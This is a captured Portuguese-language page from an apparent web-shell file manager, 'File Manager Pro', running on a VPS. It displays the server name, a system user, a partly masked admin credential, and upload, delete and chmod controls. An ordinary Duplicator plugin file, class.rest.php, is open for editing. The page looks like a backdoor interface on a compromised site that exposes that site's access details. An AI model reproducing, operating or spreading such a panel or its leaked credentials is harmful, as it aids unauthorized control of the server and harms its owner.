🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_c86d0b07 / 352c****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: class.rest.php
<?php defined('ABSPATH') || defined('DUPXABSPATH') || exit; use Duplicator\Libs\Snap\SnapIO; use Duplicator\Installer\Utils\Log\Log; use Duplicator\Installer\Core\Params\PrmMng; class DUPX_REST { const DUPLICATOR_NAMESPACE = 'duplicator/v1/'; /** * * @var string */ private $nonce = false; /** * * @var string */ private $basicAuthUser = ""; /** * * @var string */ private $basicAuthPassword = ""; /** * * @var string */ private $url = false; /** * * @var self */ private static $instance = null; /** * * @return self */ public static function getInstance() { if (is_null(self::$instance)) { self::$instance = new self(); } return self::$instance; } private function __construct() { $paramsManager = PrmMng::getInstance(); $overwriteData = $paramsManager->getValue(PrmMng::PARAM_OVERWRITE_SITE_DATA); if (is_array($overwriteData)) { if ( isset($overwriteData['restUrl']) && strlen($overwriteData['restUrl']) > 0 && isset($overwriteData['restNonce']) && strlen($overwriteData['restNonce']) > 0 ) { $this->url = SnapIO::untrailingslashit($overwriteData['restUrl']); $this->nonce = $overwriteData['restNonce']; } if (strlen($overwriteData['restAuthUser']) > 0) { $this->basicAuthUser = $overwriteData['restAuthUser']; $this->basicAuthPassword = $overwriteData['restAuthPassword']; } } } public function checkRest($reset = false, &$errorMessage = "") { static $success = null; if (is_null($success) || $reset) { try { $success = true; if ($this->nonce === false) { throw new Exception("Nonce is not set."); } if (strlen($testUrl = $this->getRestUrl('versions')) === 0) { throw new Exception("Couldn't get REST API backed URL to do tests. REST API URL was empty."); } $response = Requests::get($testUrl, array(), $this->getRequestAuthOptions()); if ($response->success == false) { Log::info(Log::v2str($response)); throw new Exception("REST API request on $testUrl failed"); } if (($result = json_decode($response->body, true)) === null) { throw new Exception("Can't decode json."); } if (!isset($result["dup"])) { throw new Exception("Did not receive the expected result."); } } catch (Exception $ex) { $success = false; $errorMessage = $ex->getMessage(); Log::info("FAILED REST API CHECK. MESSAGE: " . $ex->getMessage()); } } return $success; } public function getVersions() { $response = Requests::get($this->getRestUrl('versions'), array(), $this->getRequestAuthOptions()); if (!$response->success) { return false; } if (($result = json_decode($response->body)) === null) { return false; } return $result; } /** * Return request auth options * * @return array */ private function getRequestAuthOptions() { return array( 'auth' => new DUPX_REST_AUTH($this->nonce, $this->basicAuthUser, $this->basicAuthPassword), 'verify' => false, 'verifyname' => false ); } private function getRestUrl($subPath = '') { return $this->url ? $this->url . '/' . self::DUPLICATOR_NAMESPACE . $subPath : ''; } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar